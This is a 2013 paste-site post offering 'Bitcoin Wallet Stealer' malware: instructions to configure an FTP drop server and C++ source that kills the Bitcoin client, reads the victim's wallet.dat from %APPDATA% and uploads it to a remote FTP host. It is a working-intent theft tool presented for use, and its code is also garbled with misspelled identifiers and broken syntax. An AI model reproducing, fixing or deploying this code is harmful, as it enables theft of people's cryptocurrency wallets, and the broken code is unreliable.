Bitcoin Wallet Stealer

SUBMITTED BY: Guest

DATE: Oct. 24, 2013, 2:49 p.m.

FORMAT: Text only

SIZE: 3.6 kB

Raw Download

HITS: 2796

Report
  1. Bitcoin Wallet Stealer
  2. Compiled by Satan
  3. Compiled File - NOT EXIST
  5. Current Problem Anti Virus still picks it up as an a miner trojan but works well
  6. Run the file and edit the settings as required
  7. FTP Host:(where you want the wallet.dat sent)
  8. User name: (FTP user name)
  9. Password: (FTP password)
  11. I still recommend creatig a temp ftp account at of the free web hosts in case of back connect.
  13. Source Code:
  15. #include <windows.h>
  16. #include <tlhelp32.h>
  17. #include <tchar.h>
  19. #include <wininet.h>
  20. #include <ctime>
  21. #include <iostream>
  22. #pragma comment(lib, "wininet")
  24. void killprocess()
  25. {
  26. HANDLE hProcessSnapShot = CreteToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
  27. // Get the process list snapshot.
  28. PROCESSENTRY32 PrcessEntry = { 0 };
  29. // Initialize the process entry structure.
  30. ProcessEntry.dwSize = sizeof( ProcessEntry );
  31. // Get the first process info
  32. BOOL Return = FALSE;
  33. Return = Process32First( hProcessSnapShot,&ProcessEntry );
  34. int value = _tcsicmp(PrcessEntry.szExeFile, _T("bitcoin.exe"));
  35. if (value==0)
  36. {
  37. HANDLE hProcess = OpenPrcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32PrcessID);
  38. //Open Process to terminate
  39. TerminateProcess(hProcess,0);
  40. CloseHandle(hPrcess); //Close Handle }
  41. }
  42. while( Process32Next( hPrcessSnapShot, &ProcessEntry ));
  43. CloseHandle( hProcessSnapShot );
  44. }
  46. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  47. {
  48. killprocess();
  49. Sleep(40000);
  50. srand((unsigned)time(NULL)); // we get time to use for random seed
  51. int seedone=rand(); // seed one
  52. int seedtwo=rand()*3; // seed two times 3
  53. int seedboth = sedone + seedtwo; // combine seeds to ensure random int
  54. // now we need to convert int to char
  55. char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
  56. itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
  57. // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
  59. char* appdata = getenv("APPDATA"); //Gets %Appdata% path
  60. char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); //Bitcoin file to steal
  61. //ftp connection
  62. HINTERNET hInternet;
  63. HINTERNET hFtpSession;
  64. hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  65. hFtpSession = InternetConnect(hInternet, "myftphost.com", INTERNET_DEFAULT_FTP_PORT, "myusername", "passisme", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
  67. FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
  68. FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
  70. InternetCloseHandle(FtpSession);
  71. InternetCloseHandle(Internet);
  73. return 0;
  74. }
comments powered by Disqus